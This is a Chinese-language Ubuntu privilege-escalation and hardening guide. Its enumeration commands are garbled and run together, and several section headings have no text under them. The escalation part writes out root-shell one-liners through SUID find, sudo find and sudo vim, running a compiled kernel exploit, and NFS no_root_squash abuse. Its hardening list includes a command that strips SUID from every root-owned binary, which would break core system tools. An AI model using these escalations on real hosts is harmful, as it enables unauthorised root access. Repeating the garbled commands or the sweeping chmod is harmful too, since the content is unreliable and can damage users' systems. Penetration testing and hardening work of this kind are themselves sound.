Ubuntu Exploit 用户指南 合规测试与加固
一 合规与范围
二 信息收集与枚举
cat /etc/os-release、lsb_release -a、uname -a、cat /proc/versionuname -m、hostnameid、whoamisudo -lw、last、lastlog、cat /etc/passwd | grep -v nologinnetstat -lntp、ss -lntpps aux、top、cat /etc/servicesdpkg -lcrontab -l、cat /etc/crontab、ls -al /etc/cron*history、env、echo $PATHnmap -p- -sV --script vuln <目标IP>。三 常见提权路径与简要复现
searchsploit linux <版本/发行版>;或访问 Exploit-DB 在线检索。searchsploit linux 3.13.0 ubuntugcc exploit.c -o exploit && chmod +x exploit && ./exploitfind / -perm -u+s -type f 2>/dev/nullfind 具 SUID,可执行 find / -exec /bin/bash -p \; 获取 root shell(仅在存在该配置时成立)。sudo -lsudo find / -name test -exec /bin/sh \;、sudo vim -c ':!sh'(旧版 nmap --interactive 亦可被滥用)。crontab -l、cat /etc/crontab、systemctl list-timersno_root_squash 时,可在挂载点创建 SUID 二进制实现提权。/etc/exports 与挂载点权限。LinEnum、linux-exploit-suggester,用于快速枚举与漏洞建议(仅作辅助,仍需人工验证)。四 安全加固与修复清单
sudo apt update && sudo apt full-upgrade -y && sudo rebootPermitRootLogin no、PasswordAuthentication nosudo systemctl restart sshdsudoers:sudo visudo -c,移除不必要的 NOPASSWD 与过宽规则。find / -user root -perm -4000 -ls -exec chmod u-s {} \;sudo ufw allow 22/tcp && sudo ufw enablecat /proc/sys/kernel/unprivileged_bpf_disabled;若为 0,可临时缓解:echo 1 > /proc/sys/kernel/unprivileged_bpf_disabled(重启后失效,需持久化配置)。五 法律与安全声明